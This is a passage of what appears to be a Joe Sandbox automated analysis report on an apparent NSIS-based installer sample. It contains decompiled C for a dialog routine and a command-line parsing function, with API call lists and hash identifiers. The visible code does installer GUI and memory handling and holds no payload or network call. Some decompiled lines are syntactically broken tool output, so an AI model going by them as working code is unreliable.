                                                            					E00404309( *0x44e3e8);
                                                            				}
                                                            				_t161 = GetDlgItem(_a4, 0x3ec);
                                                            				SendMessageA(_t161, 0x401, _t150, 0x75300000);
                                                            				if(( *0x452438 & 0x00000004) != 0) {
                                                            					SendMessageA(_t161, 0x409, _t150, _a8);
                                                            					SendMessageA(_t161, 0x2001, _t150, _a12);
                                                            				}
                                                            				goto L36;
                                                            			}



































                                                            APIs
                                                            • GetDlgItem.USER32(?,00000403), ref: 00405515
                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405524
                                                            • GetClientRect.USER32 ref: 00405561
                                                            • GetSystemMetrics.USER32 ref: 00405568
                                                            • SendMessageA.USER32 ref: 00405589
                                                            • SendMessageA.USER32 ref: 0040559A
                                                            • SendMessageA.USER32 ref: 004055AD
                                                            • SendMessageA.USER32 ref: 004055BB
                                                            • SendMessageA.USER32 ref: 004055CE
                                                            • ShowWindow.USER32(00000000,?), ref: 004055F0
                                                            • ShowWindow.USER32(?,00000008), ref: 00405604
                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405625
                                                            • SendMessageA.USER32 ref: 00405635
                                                            • SendMessageA.USER32 ref: 0040564E
                                                            • SendMessageA.USER32 ref: 0040565A
                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405533
                                                              • Part of subcall function 00404309: SendMessageA.USER32 ref: 00404317
                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405676
                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_0000544A,00000000), ref: 00405684
                                                            • CloseHandle.KERNELBASE(00000000), ref: 0040568B
                                                            • ShowWindow.USER32(00000000), ref: 004056AE
                                                            • ShowWindow.USER32(?,00000008), ref: 004056B5
                                                            • ShowWindow.USER32(00000008), ref: 004056FB
                                                            • SendMessageA.USER32 ref: 0040572F
                                                            • CreatePopupMenu.USER32 ref: 00405740
                                                            • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405755
                                                            • GetWindowRect.USER32(?,000000FF), ref: 00405775
                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578E
                                                            • SendMessageA.USER32 ref: 004057CA
                                                            • OpenClipboard.USER32(00000000), ref: 004057DA
                                                            • EmptyClipboard.USER32 ref: 004057E0
                                                            • GlobalAlloc.KERNEL32(00000042,?), ref: 004057E9
                                                            • GlobalLock.KERNEL32 ref: 004057F3
                                                            • SendMessageA.USER32 ref: 00405807
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405820
                                                            • SetClipboardData.USER32 ref: 0040582B
                                                            • CloseClipboard.USER32 ref: 00405831
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                            • String ID: <r
                                                            • API String ID: 590372296-2530491772
                                                            • Opcode ID: 1100f4880005faef561a40811008994f6c97a2979eea71fdeb132e64cd9f5767
                                                            • Instruction ID: a29ac8d60da1fb34f4aa2469bcdf397c87ff466403413f05bd0ae09002c56f5c
                                                            • Opcode Fuzzy Hash: 1100f4880005faef561a40811008994f6c97a2979eea71fdeb132e64cd9f5767
                                                            • Instruction Fuzzy Hash: 7BA16BB1900608BFEB119F64DE89EAE7B79FB08354F00403AFA45B61A1CB754E51DF68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 93%
                                                            			E73C22288() {
                                                            				CHAR* _t236;
                                                            				void* _t238;
                                                            				signed int _t239;
                                                            				char _t240;
                                                            				char _t241;
                                                            				void _t242;
                                                            				CHAR* _t243;
                                                            				void* _t249;
                                                            				struct HINSTANCE__* _t250;
                                                            				CHAR* _t251;
                                                            				int _t252;
                                                            				CHAR* _t253;
                                                            				signed short _t255;
                                                            				CHAR* _t259;
                                                            				void* _t260;
                                                            				CHAR** _t261;
                                                            				intOrPtr _t264;
                                                            				void* _t272;
                                                            				signed int _t273;
                                                            				CHAR* _t274;
                                                            				CHAR* _t276;
                                                            				CHAR* _t279;
                                                            				void* _t281;
                                                            				CHAR* _t282;
                                                            				void _t283;
                                                            				signed int _t287;
                                                            				void* _t288;
                                                            				void* _t291;
                                                            				CHAR* _t298;
                                                            				signed int _t299;
                                                            				CHAR* _t303;
                                                            				CHAR* _t305;
                                                            				CHAR* _t306;
                                                            				CHAR* _t307;
                                                            				CHAR* _t312;
                                                            				CHAR* _t313;
                                                            				char _t319;
                                                            				CHAR* _t320;
                                                            				char _t323;
                                                            				signed int _t333;
                                                            				void* _t335;
                                                            				CHAR* _t336;
                                                            				CHAR* _t337;
                                                            				void _t338;
                                                            				CHAR* _t341;
                                                            				CHAR* _t343;
                                                            				signed int _t345;
                                                            				signed int _t346;
                                                            				void* _t347;
                                                            				void* _t348;
                                                            				void* _t349;
                                                            				signed int _t355;
                                                            				CHAR* _t360;
                                                            				void* _t361;
                                                            				signed int _t368;
                                                            				signed int _t369;
                                                            				CHAR* _t370;
                                                            				void* _t371;
                                                            				CHAR* _t377;
                                                            				signed int _t379;
                                                            				CHAR* _t380;
                                                            				void* _t382;
                                                            				void* _t383;
                                                            				CHAR* _t384;
                                                            				CHAR* _t385;
                                                            				CHAR* _t386;
                                                            				CHAR* _t387;
                                                            				struct HINSTANCE__* _t388;
                                                            				CHAR* _t390;
                                                            				void* _t391;
                                                            				void* _t392;
                                                            
                                                            				 *(_t392 + 0x1c) = 0;
                                                            				_t382 = 0;
                                                            				 *(_t392 + 0x34) = 0;
                                                            				 *(_t392 + 0x30) = 0;
                                                            				 *(_t392 + 0x18) = 0;
                                                            				 *(_t392 + 0x2c) = 0;
                                                            				 *(_t392 + 0x3c) = 0;
                                                            				 *(_t392 + 0x28) = 0;
                                                            				_t236 = E73C212C6();
                                                            				 *(_t392 + 0x14) = _t236;
                                                            				_t312 = _t236;
                                                            				 *(_t392 + 0x38) = E73C212C6();
                                                            				_t238 = E73C2152B();
                                                            				_t391 = _t238;
                                                            				 *(_t392 + 0x44) = _t238;
                                                            				_t383 = _t238;
                                                            				 *(_t392 + 0x24) = _t391;
                                                            				 *((intOrPtr*)(_t392 + 0x48)) = 2;
                                                            				_t239 = 0;
                                                            				while(1) {
                                                            					_t368 = _t239;
                                                            					 *(_t392 + 0x40) = _t368;
                                                            					if(_t239 != 0 && _t382 == 0) {
                                                            						break;
                                                            					}
                                                            					_t240 =  *_t391;
                                                            					 *((char*)(_t392 + 0x13)) = _t240;
                                                            					_t241 = _t240;
                                                            					_t319 = _t241;
                                                            					if(_t319 == 0) {
                                                            						_t169 = _t392 + 0x1c;
                                                            						 *_t169 =  *(_t392 + 0x1c) | 0xffffffff;
                                                            						__eflags =  *_t169;
                                                            						L132:
                                                            						_t369 = _t368;
                                                            						if(_t369 == 0) {
                                                            							_t370 = 0;
                                                            							 *_t312 = 0;
                                                            							__eflags = _t382;
                                                            							if(_t382 == 0) {
                                                            								_t281 = GlobalAlloc(0x40, 0x14a4); // executed
                                                            								_t382 = _t281;
                                                            								_t370 = 0;
                                                            								__eflags = 0;
                                                            								 *(_t382 + 0x810) = 0;
                                                            								 *(_t382 + 0x814) = 0;
                                                            							}
                                                            							_t242 =  *(_t392 + 0x34);
                                                            							_t177 = _t382 + 8; // 0x8
                                                            							_t320 = _t177;
                                                            							_t178 = _t382 + 0x408; // 0x408
                                                            							_t384 = _t178;
                                                            							 *_t382 = _t242;
                                                            							 *_t320 = _t370;
                                                            							 *_t384 = _t370;
                                                            							 *(_t382 + 0x808) = _t370;
                                                            							 *(_t382 + 0x80c) = _t370;
                                                            							 *(_t382 + 4) = _t370;
                                                            							_t243 = _t242 - _t370;
                                                            							__eflags = _t243;
                                                            							if(_t243 == 0) {
                                                            								__eflags = _t312 -  *(_t392 + 0x14);
                                                            								if(_t312 ==  *(_t392 + 0x14)) {
                                                            									goto L154;
                                                            								}
                                                            								_t390 = _t370;
                                                            								GlobalFree(_t382);
                                                            								_push( *(_t392 + 0x14));
                                                            								_t382 = E73C21326();
                                                            								__eflags = _t382;
                                                            								if(_t382 == 0) {
                                                            									goto L154;
                                                            								} else {
                                                            									goto L147;
                                                            								}
                                                            								while(1) {
                                                            									L147:
                                                            									_t272 =  *(_t382 + 0x14a0);
                                                            									__eflags = _t272;
                                                            									if(_t272 == 0) {
                                                            										break;
                                                            									}
                                                            									_t390 = _t382;
                                                            									_t382 = _t272;
                                                            								}
                                                            								__eflags = _t390;
                                                            								if(_t390 != 0) {
                                                            									_t187 =  &(_t390[0x14a0]);
                                                            									 *_t187 = _t390[0x14a0] & 0x00000000;
                                                            									__eflags =  *_t187;
                                                            								}
                                                            								_t273 =  *(_t382 + 0x810);
                                                            								__eflags = _t273 & 0x00000008;
                                                            								if((_t273 & 0x00000008) == 0) {
                                                            									_t333 = 2;
                                                            									_t274 = _t273 | _t333;
                                                            									__eflags = _t274;
                                                            									 *(_t382 + 0x810) = _t274;
                                                            								} else {
                                                            									_t382 = E73C212D5(_t382);
                                                            									 *(_t382 + 0x810) =  *(_t382 + 0x810) & 0xfffffff5;
                                                            								}
                                                            								goto L154;
                                                            							} else {
                                                            								_t276 = _t243 - 1;
                                                            								__eflags = _t276;
                                                            								if(_t276 == 0) {
                                                            									L143:
                                                            									lstrcpyA(_t320,  *(_t392 + 0x38));
                                                            									L144:
                                                            									lstrcpyA(_t384,  *(_t392 + 0x14));
                                                            									L154:
                                                            									_t312 =  *(_t392 + 0x14);
                                                            									L155:
                                                            									_t239 =  *(_t392 + 0x1c);
                                                            									_t391 = _t391 + 1;
                                                            									 *(_t392 + 0x24) = _t391;
                                                            									_t383 = _t391;
                                                            									if(_t239 != 0xffffffff) {
                                                            										continue;
                                                            									}
                                                            									break;
                                                            								}
                                                            								_t279 = _t276 - 1;
                                                            								__eflags = _t279;
                                                            								if(_t279 == 0) {
                                                            									goto L144;
                                                            								}
                                                            								__eflags = _t279 != 1;
                                                            								if(_t279 != 1) {
                                                            									goto L154;
                                                            								}
                                                            								goto L143;
                                                            							}
                                                            						}
                                                            						_t371 = _t369 - 1;
                                                            						if(_t371 == 0) {
                                                            							_t282 =  *(_t392 + 0x30);
                                                            							if( *(_t392 + 0x2c) == _t371) {
                                                            								_t282 = _t282 - 1;
                                                            							}
                                                            							 *(_t382 + 0x814) = _t282;
                                                            						}
                                                            						goto L154;
                                                            					}
                                                            					_t335 = _t319 - 0x23;
                                                            					if(_t335 == 0) {
                                                            						_t336 =  *(_t392 + 0x1c);
                                                            						__eflags = _t383 -  *(_t392 + 0x44);
                                                            						if(_t383 <=  *(_t392 + 0x44)) {
                                                            							L29:
                                                            							__eflags =  *(_t392 + 0x28);
                                                            							if( *(_t392 + 0x28) != 0) {
                                                            								L15:
                                                            								_t337 = _t336;
                                                            								__eflags = _t337;
                                                            								if(_t337 == 0) {
                                                            									_t283 =  *((intOrPtr*)(_t392 + 0x13));
                                                            									while(1) {
                                                            										__eflags = _t283 - 0x22;
                                                            										if(_t283 != 0x22) {
                                                            											break;
                                                            										}
                                                            										_t391 = _t391 + 1;
                                                            										__eflags =  *(_t392 + 0x28);
                                                            										_t383 = _t391;
                                                            										if( *(_t392 + 0x28) == 0) {
                                                            											__eflags = 1;
                                                            											 *(_t392 + 0x28) = 1;
                                                            											L121:
                                                            											 *_t312 =  *_t391;
                                                            											_t312 =  &(_t312[1]);
                                                            											goto L155;
                                                            										}
                                                            										_t157 = _t392 + 0x28;
                                                            										 *_t157 =  *(_t392 + 0x28) & 0x00000000;
                                                            										__eflags =  *_t157;
                                                            										_t283 =  *_t391;
                                                            									}
                                                            									__eflags = _t283 - 0x2a;
                                                            									if(_t283 == 0x2a) {
                                                            										_t287 = 2;
                                                            										 *(_t392 + 0x34) = _t287;
                                                            										L129:
                                                            										_t385 =  *(_t392 + 0x14);
                                                            										L130:
                                                            										_t312 = _t385;
                                                            										goto L155;
                                                            									}
                                                            									__eflags = _t283 - 0x2d;
                                                            									if(_t283 == 0x2d) {
                                                            										L117:
                                                            										_t338 =  *_t391;
                                                            										__eflags = _t338 - 0x2d;
                                                            										if(_t338 != 0x2d) {
                                                            											L122:
                                                            											_t162 = _t391 + 1; // 0x1
                                                            											_t288 = _t162;
                                                            											__eflags =  *_t288 - 0x3a;
                                                            											if( *_t288 != 0x3a) {
                                                            												goto L121;
                                                            											}
                                                            											__eflags = _t338 - 0x2d;
                                                            											if(_t338 == 0x2d) {
                                                            												goto L121;
                                                            											}
                                                            											__eflags = 1;
                                                            											 *(_t392 + 0x34) = 1;
                                                            											L125:
                                                            											_t385 =  *(_t392 + 0x14);
                                                            											_t391 = _t288;
                                                            											__eflags = _t312 - _t385;
                                                            											if(_t312 <= _t385) {
                                                            												 *( *(_t392 + 0x38)) = 0;
                                                            											} else {
                                                            												 *_t312 = 0;
                                                            												lstrcpyA( *(_t392 + 0x3c), _t385);
                                                            											}
                                                            											goto L130;
                                                            										}
                                                            										_t159 = _t383 + 1; // 0x1
                                                            										_t288 = _t159;
                                                            										__eflags =  *_t288 - 0x3e;
                                                            										if( *_t288 != 0x3e) {
                                                            											goto L122;
                                                            										}
                                                            										 *(_t392 + 0x34) = 3;
                                                            										goto L125;
                                                            									}
                                                            									__eflags = _t283 - 0x3a;
                                                            									if(_t283 != 0x3a) {
                                                            										goto L121;
                                                            									}
                                                            									goto L117;
                                                            								}
                                                            								_t341 = _t337 - 1;
                                                            								__eflags = _t341;
                                                            								if(_t341 == 0) {
                                                            									_t313 =  *(_t392 + 0x30);
                                                            									L49:
                                                            									_t291 = _t241 + 0xffffffde;
                                                            									__eflags = _t291 - 0x55;
                                                            									if(_t291 > 0x55) {
                                                            										goto L129;
                                                            									}
                                                            									_t76 = _t291 + 0x73c22b1c; // 0x73c2402c
                                                            									switch( *((intOrPtr*)(( *_t76 & 0x000000ff) * 4 +  &M73C22A94))) {
                                                            										case 0:
                                                            											__esi =  *(__esp + 0x14);
                                                            											__ecx =  *(__esp + 0x14);
                                                            											__dl =  *((intOrPtr*)(__esp + 0x13));
                                                            											while(1) {
                                                            												__ebp = __ebp + 1;
                                                            												__al =  *__ebp;
                                                            												__eflags = __al - __dl;
                                                            												if(__al != __dl) {
                                                            													goto L87;
                                                            												}
                                                            												L86:
                                                            												__eflags =  *(__ebp + 1) - __dl;
                                                            												if( *(__ebp + 1) != __dl) {
                                                            													L91:
                                                            													 *__ecx = 0;
                                                            													__esi = E73C212AF(__esi);
                                                            													goto L92;
                                                            												}
                                                            												L87:
                                                            												__eflags = __al;
                                                            												if(__al == 0) {
                                                            													goto L91;
                                                            												}
                                                            												__eflags = __al - __dl;
                                                            												if(__al == __dl) {
                                                            													__ebp = __ebp + 1;
                                                            													__eflags = __ebp;
                                                            												}
                                                            												__al =  *__ebp;
                                                            												 *__ecx =  *__ebp;
                                                            												__ecx = __ecx + 1;
                                                            												__ebp = __ebp + 1;
                                                            												__al =  *__ebp;
                                                            												__eflags = __al - __dl;
                                                            												if(__al != __dl) {
                                                            													goto L87;
                                                            												}
                                                            												goto L86;
                                                            											}
                                                            										case 1:
                                                            											L46:
                                                            											 *(_t392 + 0x18) = 1;
                                                            											goto L129;
                                                            										case 2:
                                                            											 *(__esp + 0x18) =  *(__esp + 0x18) | 0xffffffff;
                                                            											goto L129;
                                                            										case 3:
                                                            											 *(__esp + 0x18) =  *(__esp + 0x18) & 0;
                                                            											__eax = 0;
                                                            											 *(__esp + 0x20) =  *(__esp + 0x20) & 0;
                                                            											__ebx = __ebx + 1;
                                                            											__eax = 1;
                                                            											 *(__esp + 0x30) = __ebx;
                                                            											 *((intOrPtr*)(__esp + 0x2c)) = 1;
                                                            											goto L129;
                                                            										case 4:
                                                            											__eflags =  *(__esp + 0x20);
                                                            											if( *(__esp + 0x20) != 0) {
                                                            												goto L129;
                                                            											}
                                                            											 *(__esp + 0x24) = __ebp;
                                                            											__esi = E73C212C6();
                                                            											__eax = __esp + 0x24;
                                                            											_push(__esi);
                                                            											__eax = E73C21B4C(__eax);
                                                            											_push(__edx);
                                                            											_push(__eax);
                                                            											__eax = E73C2144D(__ecx);
                                                            											__esp = __esp + 0xc;
                                                            											goto L80;
                                                            										case 5:
                                                            											 *(__esp + 0x20) =  *(__esp + 0x20) + 1;
                                                            											goto L129;
                                                            										case 6:
                                                            											_push(7);
                                                            											goto L74;
                                                            										case 7:
                                                            											_push(0x19);
                                                            											goto L101;
                                                            										case 8:
                                                            											__eax = 0;
                                                            											__eax = 1;
                                                            											__edx = 1;
                                                            											goto L58;
                                                            										case 9:
                                                            											_push(0x15);
                                                            											goto L101;
                                                            										case 0xa:
                                                            											_push(0x16);
                                                            											goto L101;
                                                            										case 0xb:
                                                            											_push(0x18);
                                                            											goto L101;
                                                            										case 0xc:
                                                            											__eax = 0;
                                                            											__eflags = 0;
                                                            											_t103 = __eax + 1; // 0x1
                                                            											__edx = _t103;
                                                            											goto L69;
                                                            										case 0xd:
                                                            											__eax = 0;
                                                            											__eax = 1;
                                                            											__edx = 1;
                                                            											goto L61;
                                                            										case 0xe:
                                                            											__eax = 0;
                                                            											__eax = 1;
                                                            											__edx = 1;
                                                            											goto L75;
                                                            										case 0xf:
                                                            											__eax = 0;
                                                            											__eflags = 0;
                                                            											_t105 = __eax + 1; // 0x1
                                                            											__edx = _t105;
                                                            											goto L73;
                                                            										case 0x10:
                                                            											__eax = 0;
                                                            											__eflags = 0;
                                                            											_t100 = __eax + 1; // 0x1
                                                            											__edx = _t100;
                                                            											goto L65;
                                                            										case 0x11:
                                                            											_push(3);
                                                            											goto L74;
                                                            										case 0x12:
                                                            											_push(0x17);
                                                            											L101:
                                                            											_pop(__esi);
                                                            											goto L102;
                                                            										case 0x13:
                                                            											__eax = __esp + 0x24;
                                                            											__eax = E73C21B4C(__esp + 0x24);
                                                            											_push(0xb);
                                                            											_pop(__esi);
                                                            											_t134 = __eax + 1; // 0x1
                                                            											__ecx = _t134;
                                                            											__eflags = _t134 - __esi;
                                                            											_push(1);
                                                            											_pop(__ecx);
                                                            											__esi =  >=  ? _t134 : __esi;
                                                            											__esi = __eax + __esi;
                                                            											__eflags = __esi;
                                                            											L80:
                                                            											__ebp =  *(__esp + 0x24);
                                                            											goto L93;
                                                            										case 0x14:
                                                            											__esi = __esi | 0xffffffff;
                                                            											goto L102;
                                                            										case 0x15:
                                                            											 *((intOrPtr*)(__esp + 0x3c)) =  *((intOrPtr*)(__esp + 0x3c)) + 1;
                                                            											_push(3);
                                                            											goto L74;
                                                            										case 0x16:
                                                            											__eax = 0;
                                                            											goto L75;
                                                            										case 0x17:
                                                            											__eax = 0;
                                                            											__eflags = 0;
                                                            											_t104 = __eax + 1; // 0x1
                                                            											__edx = _t104;
                                                            											goto L71;
                                                            										case 0x18:
                                                            											_t342 =  *(_t382 + 0x814);
                                                            											__eflags = _t342 - _t313;
                                                            											_push(1);
                                                            											_t294 =  <=  ? _t313 : _t342;
                                                            											 *(_t392 + 0x1c) =  *(_t392 + 0x1c) & 0;
                                                            											 *(_t392 + 0x24) =  *(_t392 + 0x24) & 0;
                                                            											_t314 =  <=  ? _t313 : _t342;
                                                            											__eflags =  *(_t392 + 0x38) - 3;
                                                            											 *(_t392 + 0x34) =  <=  ? _t313 : _t342;
                                                            											__eflags = _t342 - (0 |  *(_t392 + 0x38) == 0x00000003);
                                                            											_pop(_t297);
                                                            											_t374 =  !=  ? _t297 :  *(_t392 + 0x30);
                                                            											 *(_t392 + 0x2c) =  !=  ? _t297 :  *(_t392 + 0x30);
                                                            											goto L129;
                                                            										case 0x19:
                                                            											__eax = 0;
                                                            											__eax = 1;
                                                            											__eflags = 1;
                                                            											L58:
                                                            											_push(2);
                                                            											_pop(__ecx);
                                                            											 *(__esp + 0x18) = __ecx;
                                                            											goto L75;
                                                            										case 0x1a:
                                                            											L69:
                                                            											_push(5);
                                                            											goto L74;
                                                            										case 0x1b:
                                                            											__eax = 0;
                                                            											__eax = 1;
                                                            											__eflags = 1;
                                                            											L61:
                                                            											_push(3);
                                                            											_pop(__esi);
                                                            											 *(__esp + 0x18) = __esi;
                                                            											goto L75;
                                                            										case 0x1c:
                                                            											__eax = 0;
                                                            											__eax = 1;
                                                            											goto L75;
                                                            										case 0x1d:
                                                            											L73:
                                                            											_push(6);
                                                            											goto L74;
                                                            										case 0x1e:
                                                            											L65:
                                                            											_push(2);
                                                            											goto L74;
                                                            										case 0x1f:
                                                            											__eax = __esp + 0x24;
                                                            											__eax = E73C21B4C(__esp + 0x24);
                                                            											__ebp =  *(__esp + 0x28);
                                                            											_t138 = __eax + 1; // 0x1
                                                            											__esi = _t138;
                                                            											L92:
                                                            											_pop(__ecx);
                                                            											L93:
                                                            											__eflags = __esi;
                                                            											if(__esi == 0) {
                                                            												goto L129;
                                                            											}
                                                            											L102:
                                                            											__ecx =  *(__esp + 0x20);
                                                            											0 = 1;
                                                            											 *((intOrPtr*)(__esp + 0x2c)) = 1;
                                                            											__eflags = __ecx;
                                                            											if(__ecx != 0) {
                                                            												__eflags = __ecx - 1;
                                                            												if(__ecx == 1) {
                                                            													__eax = __ebx;
                                                            													__eax = __ebx << 5;
                                                            													__eflags = __eax;
                                                            													 *(__eax + __edi + 0x82c) = __esi;
                                                            												}
                                                            												L109:
                                                            												 *(__esp + 0x20) = __ecx;
                                                            												goto L129;
                                                            											}
                                                            											__ebx = __ebx << 5;
                                                            											__eax =  *(__ebx + __edi + 0x830);
                                                            											__eflags = __eax - 0xffffffff;
                                                            											if(__eax <= 0xffffffff) {
                                                            												L105:
                                                            												__eax = GlobalFree(__eax);
                                                            												__ecx =  *(__esp + 0x20);
                                                            												L106:
                                                            												 *(__ebx + __edi + 0x830) = __esi;
                                                            												goto L109;
                                                            											}
                                                            											__eflags = __eax - 0x19;
                                                            											if(__eax <= 0x19) {
                                                            												goto L106;
                                                            											}
                                                            											goto L105;
                                                            										case 0x20:
                                                            											L71:
                                                            											_push(4);
                                                            											L74:
                                                            											_pop(__eax);
                                                            											L75:
                                                            											__ecx =  *(0x73c24090 + __eax * 4);
                                                            											__esi = __ebx;
                                                            											__esi = __ebx << 5;
                                                            											__edx =  ~__edx;
                                                            											_push(1);
                                                            											asm("sbb edx, edx");
                                                            											 *(__esp + 0x30) = 1;
                                                            											__edx = __edx & 0x00008000;
                                                            											__edx = __edx | __eax;
                                                            											0 = 1;
                                                            											 *(__esi + __edi + 0x818) = __edx;
                                                            											__edx =  *(__esp + 0x1c);
                                                            											__eflags = __ecx;
                                                            											__eax =  >  ? __ecx : 1;
                                                            											__eflags = __edx;
                                                            											_pop(__ecx);
                                                            											__eax =  <  ? __ecx :  >  ? __ecx : 1;
                                                            											 *((intOrPtr*)(__esi + __edi + 0x828)) =  <  ? __ecx :  >  ? __ecx : 1;
                                                            											__eflags = __edx - __ecx;
                                                            											if(__edx == __ecx) {
                                                            												__eax = __esp + 0x24;
                                                            												__eax = E73C21B4C(__esp + 0x24);
                                                            												__ebp =  *(__esp + 0x28);
                                                            												_t116 = __eax + 1; // 0x1
                                                            												__edx = _t116;
                                                            												 *(__esp + 0x18) = __edx;
                                                            											}
                                                            											 *(__esi + __edi + 0x830) =  *(__esi + __edi + 0x830) & 0x00000000;
                                                            											__ecx = __ebx + 0x41;
                                                            											__ecx = __ebx + 0x41 << 5;
                                                            											 *(__esi + __edi + 0x81c) = __edx;
                                                            											 *((__ebx + 0x41 << 5) + __edi) =  *((__ebx + 0x41 << 5) + __edi) & 0x00000000;
                                                            											 *(__esi + __edi + 0x82c) =  *(__esi + __edi + 0x82c) & 0x00000000;
                                                            											goto L129;
                                                            										case 0x21:
                                                            											goto L129;
                                                            									}
                                                            								}
                                                            								_t343 = _t341 - 1;
                                                            								__eflags = _t343;
                                                            								if(_t343 == 0) {
                                                            									_t313 = 0;
                                                            									 *(_t392 + 0x30) = 0;
                                                            									goto L49;
                                                            								}
                                                            								__eflags = _t343 != 1;
                                                            								if(_t343 != 1) {
                                                            									goto L121;
                                                            								}
                                                            								__eflags = _t241 - 0x6e;
                                                            								if(__eflags > 0) {
                                                            									_t298 = _t241 - 0x72;
                                                            									__eflags = _t298;
                                                            									if(_t298 == 0) {
                                                            										_push(4);
                                                            										L41:
                                                            										_pop(_t299);
                                                            										L42:
                                                            										_t345 =  *(_t382 + 0x810);
                                                            										__eflags =  *(_t392 + 0x18) - 1;
                                                            										if( *(_t392 + 0x18) != 1) {
                                                            											_t346 = _t345 &  !_t299;
                                                            											__eflags = _t346;
                                                            										} else {
                                                            											_t346 = _t345 | _t299;
                                                            										}
                                                            										 *(_t382 + 0x810) = _t346;
                                                            										goto L46;
                                                            									}
                                                            									_t303 = _t298 - 1;
                                                            									__eflags = _t303;
                                                            									if(_t303 == 0) {
                                                            										_push(0x10);
                                                            										goto L41;
                                                            									}
                                                            									_t347 = 2;
                                                            									__eflags = _t303 != _t347;
                                                            									if(_t303 != _t347) {
                                                            										goto L129;
                                                            									}
                                                            									_push(0x40);
                                                            									goto L41;
                                                            								}
                                                            								if(__eflags == 0) {
                                                            									_push(8);
                                                            									goto L41;
                                                            								}
                                                            								_t305 = _t241 - 0x21;
                                                            								__eflags = _t305;
                                                            								if(_t305 == 0) {
                                                            									 *(_t392 + 0x18) =  ~( *(_t392 + 0x18));
                                                            									goto L129;
                                                            								}
                                                            								_t306 = _t305 - 0x11;
                                                            								__eflags = _t306;
                                                            								if(_t306 == 0) {
                                                            									_t299 = 0x100;
                                                            									goto L42;
                                                            								}
                                                            								_t307 = _t306 - 0x31;
                                                            								__eflags = _t307;
                                                            								if(_t307 == 0) {
                                                            									_t299 = 1;
                                                            									goto L42;
                                                            								}
                                                            								_t348 = 2;
                                                            								__eflags = _t307 != _t348;
                                                            								if(_t307 != _t348) {
                                                            									goto L129;
                                                            								} else {
                                                            									_push(0x20);
                                                            									goto L41;
                                                            								}
                                                            							}
                                                            							 *(_t392 + 0x1c) =  *(_t392 + 0x1c) & 0x00000000;
                                                            							 *(_t392 + 0x34) =  *(_t392 + 0x34) & 0x00000000;
                                                            							goto L132;
                                                            						}
                                                            						__eflags =  *((char*)(_t391 - 1)) - 0x3a;
                                                            						if( *((char*)(_t391 - 1)) != 0x3a) {
                                                            							goto L29;
                                                            						}
                                                            						__eflags = _t336;
                                                            						if(_t336 == 0) {
                                                            							goto L15;
                                                            						}
                                                            						goto L29;
                                                            					}
                                                            					_t349 = _t335 - 5;
                                                            					if(_t349 == 0) {
                                                            						__eflags =  *(_t392 + 0x28);
                                                            						if( *(_t392 + 0x28) == 0) {
                                                            							 *(_t392 + 0x1c) = 1;
                                                            							__eflags =  *(_t392 + 0x34) - 3;
                                                            							_t360 = (0 |  *(_t392 + 0x34) == 0x00000003) + 1;
                                                            							__eflags = _t360;
                                                            							 *(_t392 + 0x30) = _t360;
                                                            						}
                                                            						 *(_t392 + 0x18) =  *(_t392 + 0x18) & 0x00000000;
                                                            						_t377 =  *(_t392 + 0x28);
                                                            						__eflags = _t377;
                                                            						_t351 =  ==  ?  *(_t392 + 0x18) :  *(_t392 + 0x18);
                                                            						 *(_t392 + 0x18) =  ==  ?  *(_t392 + 0x18) :  *(_t392 + 0x18);
                                                            						 *(_t392 + 0x2c) =  *(_t392 + 0x2c) & 0x00000000;
                                                            						__eflags = _t377;
                                                            						_t353 =  ==  ?  *(_t392 + 0x2c) :  *(_t392 + 0x2c);
                                                            						 *(_t392 + 0x2c) =  ==  ?  *(_t392 + 0x2c) :  *(_t392 + 0x2c);
                                                            						__eflags = _t377;
                                                            						_t355 = 0 | _t377 == 0x00000000;
                                                            						 *(_t392 + 0x20) =  *(_t392 + 0x20) & 0x00000000;
                                                            						__eflags =  *(_t392 + 0x28);
                                                            						_t379 =  ==  ?  *(_t392 + 0x20) :  *(_t392 + 0x20);
                                                            						L13:
                                                            						 *(_t392 + 0x20) = _t379;
                                                            						_t368 =  *(_t392 + 0x40);
                                                            						__eflags = _t355;
                                                            						if(_t355 != 0) {
                                                            							goto L132;
                                                            						}
                                                            						L14:
                                                            						_t336 =  *(_t392 + 0x1c);
                                                            						goto L15;
                                                            					}
                                                            					_t361 = _t349 - 1;
                                                            					if(_t361 == 0) {
                                                            						_t380 =  *(_t392 + 0x28);
                                                            						__eflags = _t380;
                                                            						_t363 =  ==  ?  *((void*)(_t392 + 0x48)) :  *(_t392 + 0x1c);
                                                            						 *(_t392 + 0x1c) =  ==  ?  *((void*)(_t392 + 0x48)) :  *(_t392 + 0x1c);
                                                            						 *(_t392 + 0x18) =  *(_t392 + 0x18) & 0x00000000;
                                                            						__eflags = _t380;
                                                            						_t365 =  ==  ?  *(_t392 + 0x18) :  *(_t392 + 0x18);
                                                            						 *(_t392 + 0x18) =  ==  ?  *(_t392 + 0x18) :  *(_t392 + 0x18);
                                                            						__eflags = _t380;
                                                            						_t355 = 0 | _t380 == 0x00000000;
                                                            						 *(_t392 + 0x20) =  *(_t392 + 0x20) & 0x00000000;
                                                            						__eflags =  *(_t392 + 0x28);
                                                            						_t379 =  ==  ?  *(_t392 + 0x20) :  *(_t392 + 0x20);
                                                            						goto L13;
                                                            					}
                                                            					if(_t361 != 0x16) {
                                                            						goto L14;
                                                            					} else {
                                                            						 *(_t392 + 0x1c) = 3;
                                                            						 *(_t392 + 0x18) = 1;
                                                            						goto L132;
                                                            					}
                                                            				}
                                                            				GlobalFree( *(_t392 + 0x44));
                                                            				GlobalFree( *(_t392 + 0x14));
                                                            				GlobalFree( *(_t392 + 0x38));
